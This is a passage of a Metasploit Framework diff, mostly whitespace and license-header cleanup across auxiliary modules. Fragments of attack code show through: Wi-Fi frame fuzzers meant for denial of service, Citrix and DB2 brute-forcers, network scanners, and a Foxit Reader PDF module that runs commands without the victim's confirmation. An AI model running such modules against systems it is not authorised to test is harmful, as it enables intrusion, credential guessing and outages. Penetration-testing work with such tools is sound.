0x00, 0x00, 0x00].pack("C*") end end diff --git a/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb b/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb index 7eb90a9742..ef9695759e 100644 --- a/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb +++ b/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,12 +19,12 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Wireless Beacon Frame Fuzzer', 'Description' => %q{ This module sends out corrupted beacon frames. }, - + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary [ OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']), OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"]) - ], self.class) + ], self.class) end def ping_check @@ -46,24 +46,24 @@ class Metasploit3 < Msf::Auxiliary end return false end - + def run - + srand(0) - + @@uni = 0 - + frames = [] - + open_wifi - + print_status("Sending corrupt frames...") - + while (true) frame = create_frame() - + if (datastore['PING_HOST']) - + if (frames.length >= 5) frames.shift frames.push(frame) @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary frames.push(frame) end - 1.upto(3) do + 1.upto(3) do wifi.write(frame) if (not ping_check()) frames.each do |f| @@ -79,9 +79,9 @@ class Metasploit3 < Msf::Auxiliary print_status f.inspect end return - end + end end - else + else wifi.write(frame) end end @@ -95,20 +95,20 @@ class Metasploit3 < Msf::Auxiliary ssid = Rex::Text.rand_text_alphanumeric(rand(256)) bssid = Rex::Text.rand_text(6) seq = [rand(255)].pack('n') - + frame = "\x80" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration + "\x00\x00" + # duration "\xff\xff\xff\xff\xff\xff" + # dst bssid + # src bssid + # bssid - seq + # seq + seq + # seq Rex::Text.rand_text(8) + # timestamp value "\x64\x00" + # beacon interval #"\x00\x05" + # capability flags - Rex::Text.rand_text(2) + - + Rex::Text.rand_text(2) + + # ssid tag "\x00" + ssid.length.chr + ssid + @@ -126,9 +126,9 @@ class Metasploit3 < Msf::Auxiliary d = Rex::Text.rand_text(l) frame += t.chr + l.chr + d end - + return frame end - + end diff --git a/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb b/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb index 9ba9f2cba2..367dcdd9c6 100644 --- a/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb +++ b/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,12 +19,12 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Wireless Probe Response Frame Fuzzer', 'Description' => %q{ This module sends out corrupted probe response frames. }, - + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' @@ -32,8 +32,8 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']), - OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"]) - ], self.class) + OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"]) + ], self.class) end def ping_check @@ -46,24 +46,24 @@ class Metasploit3 < Msf::Auxiliary end return false end - + def run - + srand(0) - + @@uni = 0 - + frames = [] - + open_wifi - + print_status("Sending corrupt frames...") - + while (true) frame = create_frame() - + if (datastore['PING_HOST']) - + if (frames.length >= 5) frames.shift frames.push(frame) @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary frames.push(frame) end - 1.upto(10) do + 1.upto(10) do wifi.write(frame) if (not ping_check()) frames.each do |f| @@ -79,9 +79,9 @@ class Metasploit3 < Msf::Auxiliary print_status f.inspect end return - end + end end - else + else wifi.write(frame) end end @@ -93,30 +93,30 @@ class Metasploit3 < Msf::Auxiliary bssid = Rex::Text.rand_text(6) seq = [rand(255)].pack('n') - - frame = + + frame = "\x50" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration + "\x00\x00" + # duration eton(datastore['ADDR_DST']) + # dst bssid + # src bssid + # bssid - seq + # seq + seq + # seq Rex::Text.rand_text(8) + # timestamp value Rex::Text.rand_text(2) + # beacon interval Rex::Text.rand_text(2) # capability flags - + ssid = Rex::Text.rand_text_alphanumeric(rand(256)) # ssid tag frame << "\x00" + ssid.length.chr + ssid # supported rates - frame << "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" - + frame << "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + # current channel frame << "\x03" + "\x01" + channel.chr - + 1.upto(ies) do |i| max = mtu - frame.length break if max < 2 @@ -125,9 +125,9 @@ class Metasploit3 < Msf::Auxiliary d = Rex::Text.rand_text(l) frame += t.chr + l.chr + d end - + return frame end - + end diff --git a/modules/auxiliary/gather/citrix_published_applications.rb b/modules/auxiliary/gather/citrix_published_applications.rb index d410d09fb1..6b5edb98f8 100644 --- a/modules/auxiliary/gather/citrix_published_applications.rb +++ b/modules/auxiliary/gather/citrix_published_applications.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'URL', 'http://www.securiteam.com/exploits/5CP0B1F80S.html' ], ] )) @@ -44,14 +44,14 @@ class Metasploit3 < Msf::Auxiliary def run connect_udp - + print_status("Attempting to contact Citrix ICA service...") client_connect = "\x20\x00\x01\x30\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" udp_sock.put(client_connect) res = udp_sock.get(3) - + if (res[0,server_response.length] == server_response) print_status("Citrix MetaFrame ICA server detected. Requesting Published Applications list...") diff --git a/modules/auxiliary/gather/citrix_published_bruteforce.rb b/modules/auxiliary/gather/citrix_published_bruteforce.rb index 7cf143860e..a9b73b6eef 100644 --- a/modules/auxiliary/gather/citrix_published_bruteforce.rb +++ b/modules/auxiliary/gather/citrix_published_bruteforce.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'patrick' ], 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'OSVDB', '50617' ], [ 'BID', '5817' ], [ 'URL', 'http://sh0dan.org/oldfiles/hackingcitrix.html' ], @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary def run connect_udp - + print_status("Attempting to contact Citrix ICA service...") client = Rex::Text.rand_text_alphanumeric(8) # Client NetBIOS hostname. This works fine >:) @@ -139,10 +139,10 @@ class Metasploit3 < Msf::Auxiliary application_valid = "\x3e\x00\x02\x35\x02\xfd\xa8\xe3\x02\x00\x06\x44" # Citrix is publishing this application application_invalid = "\x20\x00\x01\x3a\x02\xfd\xa8\xe3\x02\x00\x06\x44" # Application not found / published - + udp_sock.put(client_connect) res = udp_sock.get(3) - + if (res[0,server_response.length] == server_response) print_status("Citrix ICA Server Detected. Attempting to brute force Published Applications.") @@ -153,19 +153,19 @@ class Metasploit3 < Msf::Auxiliary packet << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\x00\x02\x00" packet << "#{(39 + application.length).chr}\x00\x00\x00\x00\x00" + application + "\x00\x01\x00\x04\x00" packet << client + "\x00" - + udp_sock.put(packet) res = udp_sock.get(3) - + if (res[0,application_valid.length] == application_valid) print_status("Found: #{application}") end - + if (res[0,application_invalid.length] == application_invalid) print_error("NOT Found: #{application}") end end - + else print_error("Server did not respond.") end diff --git a/modules/auxiliary/pdf/foxit/authbypass.rb b/modules/auxiliary/pdf/foxit/authbypass.rb index d2b3f44364..fc53c07ae3 100644 --- a/modules/auxiliary/pdf/foxit/authbypass.rb +++ b/modules/auxiliary/pdf/foxit/authbypass.rb @@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' require 'zlib' @@ -17,14 +21,14 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Foxit Reader Authorization Bypass', 'Description' => %q{ This module exploits a authorization bypass vulnerability in Foxit Reader - build 1120. When a attacker creates a specially crafted pdf file containing - a Open/Execute action, arbitrary commands can be executed without confirmation - from the victim. + build 1120. When a attacker creates a specially crafted pdf file containing + a Open/Execute action, arbitrary commands can be executed without confirmation + from the victim. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC', 'Didier Stevens ', ], + 'Author' => [ 'MC', 'Didier Stevens ', ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2009-0836' ], [ 'BID', '34035' ], @@ -32,12 +36,12 @@ class Metasploit3 < Msf::Auxiliary 'DisclosureDate' => 'Mar 9 2009', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('CMD', [ false, 'The command to execute.', '/C/Windows/System32/calc.exe']), - OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']), - OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']), - ], self.class) + register_options( + [ + OptString.new('CMD', [ false, 'The command to execute.', '/C/Windows/System32/calc.exe']), + OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']), + OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']), + ], self.class) end @@ -47,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary # Create the pdf pdf = make_pdf(exec) - print_status("Creating '#{datastore['FILENAME']}' file...") + print_status("Creating '#{datastore['FILENAME']}' file...") file_create(pdf) end @@ -72,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary end result end - + def ioDef(id) "%d 0 obj" % id end @@ -80,13 +84,13 @@ class Metasploit3 < Msf::Auxiliary def ioRef(id) "%d 0 R" % id end - + def make_pdf(exec) xref = [] eol = "\x0d\x0a" endobj = "endobj" << eol - + # Randomize PDF version? pdf = "%%PDF-%d.%d" % [1 + rand(2), 1 + rand(5)] << eol pdf << "%" << RandomNonASCIIString(4) << eol diff --git a/modules/auxiliary/scanner/db2/db2_auth.rb b/modules/auxiliary/scanner/db2/db2_auth.rb index add4373171..1a50b23e56 100644 --- a/modules/auxiliary/scanner/db2/db2_auth.rb +++ b/modules/auxiliary/scanner/db2/db2_auth.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -14,12 +14,12 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + include Msf::Exploit::Remote::DB2 include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'DB2 Authentication Brute Force Utility', @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => ['todb'], 'License' => MSF_LICENSE ) - + register_options( [ OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line", @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_pass.txt") ]), ], self.class) - + end def run_host(ip) @@ -58,10 +58,10 @@ class Metasploit3 < Msf::Auxiliary begin info = db2_check_login rescue ::Rex::ConnectionError - vprint_error("#{rhost}:#{rport} : Unable to attempt authentication") + vprint_error("#{rhost}:#{rport} : Unable to attempt authentication") return :abort rescue ::Rex::Proto::DRDA::RespError => e - vprint_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") + vprint_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") return :abort end disconnect diff --git a/modules/auxiliary/scanner/db2/db2_version.rb b/modules/auxiliary/scanner/db2/db2_version.rb index 58ff1376cc..16754fc457 100644 --- a/modules/auxiliary/scanner/db2/db2_version.rb +++ b/modules/auxiliary/scanner/db2/db2_version.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DB2 include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'DB2 Probe Utility', @@ -39,26 +39,26 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) verbose = datastore['VERBOSE'] begin - + info = db2_probe(2) if info[:excsatrd] inst,plat,ver,pta = info[:instance_name],info[:platform],info[:version],info[:plaintext_auth] report_info = "Platform: #{plat}, Version: #{ver}, Instance: #{inst}, Plain-Authentication: #{pta ? "OK" : "NO"}" print_status("#{ip}:#{rport} DB2 - #{report_info}") report_service( - :host => rhost, + :host => rhost, :port => rport, :name => "db2", :info => report_info ) end disconnect - + rescue ::Rex::ConnectionError - print_error("#{rhost}:#{rport} : Unable to attempt probe") if verbose + print_error("#{rhost}:#{rport} : Unable to attempt probe") if verbose return :done rescue ::Rex::Proto::DRDA::RespError => e - print_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") if verbose + print_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") if verbose return :error end end diff --git a/modules/auxiliary/scanner/db2/discovery.rb b/modules/auxiliary/scanner/db2/discovery.rb index 95215859ce..7d021f38a7 100644 --- a/modules/auxiliary/scanner/db2/discovery.rb +++ b/modules/auxiliary/scanner/db2/discovery.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -8,11 +12,11 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::Udp - + def initialize super( 'Name' => 'DB2 Discovery Service Detection.', @@ -21,14 +25,14 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'MC' ], 'License' => MSF_LICENSE ) - + register_options([Opt::RPORT(523),], self.class) deregister_options('RHOST') end def run_host(ip) - + pkt = "DB2GETADDR" + "\x00" + "SQL05000" + "\x00" begin @@ -36,9 +40,9 @@ class Metasploit3 < Msf::Auxiliary connect_udp udp_sock.put(pkt) - + res = udp_sock.read(1024).split(/\x00/) - + if (res) report_note( :host => ip, @@ -54,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary disconnect_udp rescue ::Rex::ConnectionError - rescue ::Errno::EPIPE + rescue ::Errno::EPIPE end end diff --git a/modules/auxiliary/scanner/dcerpc/hidden.rb b/modules/auxiliary/scanner/dcerpc/hidden.rb index 57831457c2..7538c764a4 100644 --- a/modules/auxiliary/scanner/dcerpc/hidden.rb +++ b/modules/auxiliary/scanner/dcerpc/hidden.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,10 +17,10 @@ class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC - + # Scanner mixin should be near last include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'Hidden DCERPC Service Discovery', @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module will query the endpoint mapper and make a list of all ncacn_tcp RPC services. It will then connect to each of - these services and use the management API to list all other + these services and use the management API to list all other RPC services accessible on this port. Any RPC service found attached to a TCP port, but not listed in the endpoint mapper, will be displayed and analyzed to see whether anonymous access is permitted. @@ -36,12 +36,12 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'hdm', 'License' => MSF_LICENSE ) - + deregister_options('RHOST', 'RPORT') end # Obtain information about a single host - def run_host(ip) + def run_host(ip) begin epm = dcerpc_endpoint_list() @@ -49,27 +49,27 @@ class Metasploit3 < Msf::Auxiliary print_status("Could not contact the endpoint mapper on #{ip}") return end - + eports = {} - + epm.each do |ep| next if !(ep[:port] and ep[:prot] and ep[:prot] == "tcp") eports[ep[:port]] ||= {} eports[ep[:port]][ep[:uuid]+'_'+ep[:vers]] = true end - + eports.each_pair do |eport, servs| - + rport = eport print_status("Looking for services on #{ip}:#{rport}...") - + ids = dcerpc_mgmt_inq_if_ids(rport) return if not ids - + ids.each do |id| if (not servs.has_key?(id[0]+'_'+id[1])) print_status("\tHIDDEN: UUID #{id[0]} v#{id[1]}") - + conn = nil bind = nil call = nil @@ -85,41 +85,41 @@ class Metasploit3 < Msf::Auxiliary res = dcerpc.call(0, NDR.long(0) * 128) call = true - + if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) data = dcerpc.last_response.stub_data end - + rescue ::Interrupt raise $! rescue ::Exception => e error = e.to_s end - + if (error and error =~ /DCERPC FAULT/ and error !~ /nca_s_fault_access_denied/) call = true end - + status = "\t\t" status << "CONN " if conn status << "BIND " if bind status << "CALL " if call status << "DATA=#{data.unpack("H*")[0]} " if data status << "ERROR=#{error} " if error - + print_status(status) print_status("") - + end end end - + rescue ::Interrupt raise $! rescue ::Exception => e print_status("Error: #{e}") end end - + end diff --git a/modules/auxiliary/scanner/dcerpc/management.rb b/modules/auxiliary/scanner/dcerpc/management.rb index f2d9f6838e..fe28accc56 100644 --- a/modules/auxiliary/scanner/dcerpc/management.rb +++ b/modules/auxiliary/scanner/dcerpc/management.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,42 +17,42 @@ class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC - + # Scanner mixin should be near last include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'Remote Management Interface Discovery', 'Version' => '$Revision$', 'Description' => %q{ - This module can be used to obtain information from the Remote + This module can be used to obtain information from the Remote Management Interface DCERPC service. }, 'Author' => 'hdm', 'License' => MSF_LICENSE ) - + deregister_options('RHOST') - + register_options( [ Opt::RPORT(135) - ], self.class) + ], self.class) end # Obtain information about a single host - def run_host(ip) + def run_host(ip) begin ids = dcerpc_mgmt_inq_if_ids(rport) return if not ids ids.each do |id| print_status("UUID #{id[0]} v#{id[1]}") - + stats = dcerpc_mgmt_inq_if_stats(rport) print_status("\t stats: " + stats.map{|i| "0x%.8x" % i}.join(", ")) if stats - + live = dcerpc_mgmt_is_server_listening(rport) print_status("\t listening: %.8x" % live) if live @@ -61,15 +61,15 @@ class Metasploit3 < Msf::Auxiliary princ = dcerpc_mgmt_inq_princ_name(rport) print_status("\t name: #{princ.unpack("H*")[0]}") if princ - + end - + rescue ::Interrupt raise $! rescue ::Exception => e print_status("Error: #{e}") end end - + end \ No newline at end of file diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb index de5c0ac771..8639e5cc46 100644 --- a/modules/auxiliary/scanner/discovery/arp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb @@ -1,5 +1,15 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' class Metasploit3 < Msf::Auxiliary @@ -7,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'ARP Sweep Local Network Discovery', @@ -18,12 +28,12 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'belch', 'License' => MSF_LICENSE ) - + register_options([ OptString.new('SHOST', [true, "Source IP Address"]), OptString.new('SMAC', [true, "Source MAC Address"]), ], self.class) - + deregister_options('SNAPLEN', 'FILTER') end @@ -32,14 +42,14 @@ class Metasploit3 < Msf::Auxiliary end def run_batch(hosts) - - shost = datastore['SHOST'] + + shost = datastore['SHOST'] smac = datastore['SMAC'] - - open_pcap({'SNAPLEN' => 68, 'FILTER' => "arp[6:2] == 0x0002"}) + + open_pcap({'SNAPLEN' => 68, 'FILTER' => "arp[6:2] == 0x0002"}) begin - + hosts.each do |dhost| probe = buildprobe(datastore['SHOST'], datastore['SMAC'], dhost) capture.inject(probe) @@ -47,34 +57,34 @@ class Metasploit3 < Msf::Auxiliary while(reply = getreply()) next if not reply[:arp] print_status("#{reply[:arp].spa} appears to be up.") - + report_host(:host => reply[:arp].spa, :mac=>reply[:arp].sha) end end - + etime = Time.now.to_f + (hosts.length * 0.05) while (Time.now.to_f < etime) while(reply = getreply()) next if not reply[:arp] print_status("#{reply[:arp].spa} appears to be up.") - + report_host(:host => reply[:arp].spa, :mac=>reply[:arp].sha) end Kernel.select(nil, nil, nil, 0.50) end - + ensure close_pcap() end end - + def buildprobe(shost, smac, dhost) n = Racket::Racket.new n.l2 = Racket::L2::Ethernet.new(Racket::Misc.randstring(14)) n.l2.src_mac = smac n.l2.dst_mac = 'ff:ff:ff:ff:ff:ff' n.l2.ethertype = 0x0806 - + n.l3 = Racket::L3::ARP.new n.l3.opcode = Racket::L3::ARP::ARPOP_REQUEST n.l3.sha = n.l2.src_mac @@ -83,11 +93,11 @@ class Metasploit3 < Msf::Auxiliary n.l3.tpa = dhost n.pack end - + def getreply pkt = capture.next return if not pkt - + eth = Racket::L2::Ethernet.new(pkt) return if not eth.ethertype == 0x0806 diff --git a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb index 5aeb002a06..b460be6f5c 100644 --- a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -10,10 +14,10 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'EMC AlphaStor Device Manager Service.', @@ -22,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'MC', 'License' => MSF_LICENSE ) - + register_options([Opt::RPORT(3000),], self.class) end @@ -32,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary connect pkt = "\x68" + Rex::Text.rand_text_alphanumeric(5) + "\x00" * 512 - + sock.put(pkt) sleep(0.25) @@ -43,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Host #{ip} is running the EMC AlphaStor Device Manager.") else print_error("Host #{ip} is not running the service...") - end + end disconnect diff --git a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb index 881cf455e3..eb04d0f52e 100644 --- a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -10,10 +14,10 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'EMC AlphaStor Library Manager Service.', @@ -22,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'MC', 'License' => MSF_LICENSE ) - + register_options([Opt::RPORT(3500),], self.class) end @@ -32,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary connect pkt = "\x51" + "\x00" * 529 - + sock.put(pkt) sleep(1) @@ -43,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Host #{ip} is running the EMC AlphaStor Library Manager.") else print_error("Host #{ip} is not running the service...") - end + end disconnect diff --git a/modules/auxiliary/scanner/ftp/anonymous.rb b/modules/auxiliary/scanner/ftp/anonymous.rb index f03466b7b5..72d9ad4f6d 100644 --- a/modules/auxiliary/scanner/ftp/anonymous.rb +++ b/modules/auxiliary/scanner/ftp/anonymous.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -27,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'Matteo Cantoni ', 'License' => MSF_LICENSE ) - + register_options( [ Opt::RPORT(21), @@ -37,13 +41,13 @@ class Metasploit3 < Msf::Auxiliary def run_host(target_host) begin - + res = connect_login(true, false) banner.strip! if banner dir = Rex::Text.rand_text_alpha(8) - if res + if res write_check = send_cmd( ['MKD', dir] , true) if (write_check and write_check =~ /^2/) @@ -64,11 +68,11 @@ class Metasploit3 < Msf::Auxiliary end disconnect - + rescue ::Interrupt raise $! rescue ::Rex::ConnectionError, ::IOError end - + end end diff --git a/modules/auxiliary/scanner/http/backup_file.rb b/modules/auxiliary/scanner/http/backup_file.rb index e43cee14a3..723286bc9d 100644 --- a/modules/auxiliary/scanner/http/backup_file.rb +++ b/modules/auxiliary/scanner/http/backup_file.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -22,21 +22,21 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Backup File Scanner', 'Description' => %q{ - This module identifies the existence of possible copies + This module identifies the existence of possible copies of a specific file in a given path. }, 'Author' => [ 'et [at] cyberspace.org' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$')) - + 'Version' => '$Revision$')) + register_options( [ OptString.new('PATH', [ true, "The path/file to identify backups", '/index.asp']) - ], self.class) - + ], self.class) + end def run_host(ip) @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary '.backup', '.bak', '.copy', - '.old', + '.old', '.orig', '.temp', '.txt', @@ -68,9 +68,9 @@ class Metasploit3 < Msf::Auxiliary 'ctype' => 'text/plain' }, 20) - if (res and res.code >= 200 and res.code < 300) + if (res and res.code >= 200 and res.code < 300) print_status("Found #{wmap_base_url}#{file}") - + report_note( :host => ip, :proto => 'HTTP', @@ -78,17 +78,17 @@ class Metasploit3 < Msf::Auxiliary :type => 'BACKUP_FILE', :data => "#{file}" ) - + else - print_status("NOT Found #{wmap_base_url}#{file}") + print_status("NOT Found #{wmap_base_url}#{file}") #To be removed or just displayed with verbose debugging. end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Timeout::Error, ::Errno::EPIPE end - - + + end end diff --git a/modules/auxiliary/scanner/http/blind_sql_query.rb b/modules/auxiliary/scanner/http/blind_sql_query.rb index dddfde9c84..d425cf2003 100644 --- a/modules/auxiliary/scanner/http/blind_sql_query.rb +++ b/modules/auxiliary/scanner/http/blind_sql_query.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -24,17 +24,17 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HTTP Blind SQL Injection GET QUERY Scanner', 'Description' => %q{ - This module identifies the existence of Blind SQL injection issues + This module identifies the existence of Blind SQL injection issues in GET Query parameters values. - + }, 'Author' => [ 'et [at] 